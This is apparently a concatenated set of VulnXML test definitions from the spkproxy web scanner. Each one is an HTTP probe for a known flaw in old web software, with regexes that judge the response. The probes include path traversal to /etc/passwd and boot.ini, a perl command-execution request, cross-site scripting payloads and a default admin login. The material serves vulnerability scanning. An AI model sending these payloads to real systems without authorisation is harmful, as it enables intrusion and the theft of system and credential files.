spkproxy/VulnXML/SiteTests/sitetest-719.xml0100664000076500007650000000704507566204543017573 0ustar davedave (oder.log) "Shopping cart software log" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /PDG_Cart/oder.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-71.xml0100664000076500007650000000726107566204543017502 0ustar davedave (test-cgi) "Apache 2.0 printenv default script does not have execute permissions but leaks file system paths." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/test-cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Premature end of script headers\: / 200 Premature end of script headers\: / 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-720.xml0100664000076500007650000000714307566204543017562 0ustar davedave (shopper.conf) "PDGSoft's PDG Shopping Cart 1.5 http://www.pdgsoft.com/ 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /PDG_Cart/shopper.conf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Authnet_Login 200 Authnet_Login 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-721.xml0100664000076500007650000000723507566204543017565 0ustar davedave (-e%20%22system('cat%20/etc/passwd');\%22) "The installed perl interpreter allows any command to be executed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/-e%20%22system('cat%20/etc/passwd');\%22 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-722.xml0100664000076500007650000001000007566204543017546 0ustar davedave (edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1) "Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-723.xml0100664000076500007650000000753307566204543017570 0ustar davedave (footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>) "Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-724.xml0100664000076500007650000000753307566204543017571 0ustar davedave (header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>) "Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-725.xml0100664000076500007650000000716707566204543017575 0ustar davedave (stats.php) "PHP based forum script Phorum allows a user to retrieve the top ten active users 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phorum/admin/stats.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Phorum Stats 200 Phorum Stats 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-726.xml0100664000076500007650000000706607566204543017574 0ustar davedave (mlog.phtml) "Remote file read vulnerability CVE-1999-0346" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /php/mlog.phtml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-727.xml0100664000076500007650000000715207566204543017571 0ustar davedave (mylog.phtml?screen=/etc/passwd) "Remote file read vulnerability CVE-1999-0346" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /php/mylog.phtml?screen=/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-728.xml0100664000076500007650000000726107566204543017573 0ustar davedave (php.exe?c:\winnt\boot.ini) "Apache/PHP installations can be misconfiugred (according to documentation) to allow files to be retrieved remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /php/php.exe?c:\winnt\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-729.xml0100664000076500007650000000744207566204543017575 0ustar davedave (bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK) "The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-72.xml0100664000076500007650000000725207566204543017503 0ustar davedave (none.php?..:..:..:..:..:..:..:etc:passwd:) "SunPS iRunbook Version 2.5.2 allows files to be read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd: HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-730.xml0100664000076500007650000000727707566204543017573 0ustar davedave (db.php) "Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/securitynews/5BP0F2A6KC.html for more info" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phpBB2/includes/db.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-731.xml0100664000076500007650000000753107566204543017565 0ustar davedave (latestwap.php?url=<script>alert('Vulnerable');</script>) "PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable toCross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-732.xml0100664000076500007650000000724707566204543017572 0ustar davedave (?page=../../../../../../../../../../boot.ini) "The PHP-Nuke Rocket add-in is vulnerable to file traversal 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phprocketaddin/?page=../../../../../../../../../../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-733.xml0100664000076500007650000000724107566204543017565 0ustar davedave (?page=../../../../../../../../../../etc/passwd) "The PHP-Nuke Rocket add-in is vulnerable to file traversal 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phprocketaddin/?page=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-734.xml0100664000076500007650000000727007566204543017570 0ustar davedave (sample/admin_/help/..%255cplsql.conf) "Oracle 9iAS allows mod_plsql to perform a directory traversal." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pls/sample/admin_/help/..%255cplsql.conf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directives added for mod-plsql 200 Directives added for mod-plsql 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-735.xml0100664000076500007650000000740307566204543017567 0ustar davedave (<script>alert('Vulnerable')</script>) "Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pls/help/<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-736.xml0100664000076500007650000000722507566204543017572 0ustar davedave (admin_/) "Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pls/portal30/admin_/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Gateway Configuration Menu 200 Gateway Configuration Menu 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-737.xml0100664000076500007650000000726007566204543017572 0ustar davedave (gateway.htm?schema=sample) "This default may allow limited administration of the Oracle server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pls/simpledad/admin_/gateway.htm?schema=sample HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Gateway Configuration Menu 200 Gateway Configuration Menu 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-738.xml0100664000076500007650000000723507566204543017575 0ustar davedave (index.php?m=projects&user_cookie=1) "dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /project/index.php?m=projects&user_cookie=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-739.xml0100664000076500007650000000744007566204543017574 0ustar davedave (english.cgi?op=rmail) "BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely. See http://www.securitytracker.com/alerts/2002/Jan/1003092.html" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pub/english.cgi?op=rmail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-73.xml0100664000076500007650000000720007566204543017475 0ustar davedave (none.php?/etc/passwd) "SunPS iRunbook Version 2.5.2 allows files to be read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /content/base/build/explorer/none.php?/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-740.xml0100664000076500007650000000722107566204543017561 0ustar davedave (ch_info.php) "PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pvote/ch_info.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-741.xml0100664000076500007650000000706307566204543017566 0ustar davedave (storemgr.pw) "Encrypted ID/Pass for Mercantec's SoftCart 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pw/storemgr.pw HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-742.xml0100664000076500007650000000727607566204543017575 0ustar davedave (search.pl?form=../../../../../../../../../../etc/passwd%00) "The ROADS search.pl allows attackers to retrieve system files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-743.xml0100664000076500007650000000724207566204543017567 0ustar davedave (wsisa.dll/WService=anything?WSMadmin") "Allows Webspeed to remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/wsisa.dll/WService=anything?WSMadmin" HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-744.xml0100664000076500007650000000712307566204543017566 0ustar davedave (s97_cgi) "SCO Unixware search script may be vulnerable to XSS and command injection 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search97cgi/s97_cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-745.xml0100664000076500007650000000752707566204543017577 0ustar davedave (s97_cgi?action=FilterSearch&filter=<script>alert('Vulnerable');</script>;) "SCO Unixware search script is vulnerable to XSS and command injection 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search97cgi/s97_cgi?action=FilterSearch&filter=<script>alert('Vulnerable');</script>; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-746.xml0100664000076500007650000001032207566204543017563 0ustar davedave (admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=) "The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ server\.javawebserver\.serviceAdmin 200 server\.javawebserver\.serviceAdmin 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-747.xml0100664000076500007650000000716707566204543017601 0ustar davedave (allaire.jrun.ssi.SSIFilter) "Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/allaire.jrun.ssi.SSIFilter HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-748.xml0100664000076500007650000000723107566204543017572 0ustar davedave (com.livesoftware.jrun.plugins.ssi.SSIFilter) "Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 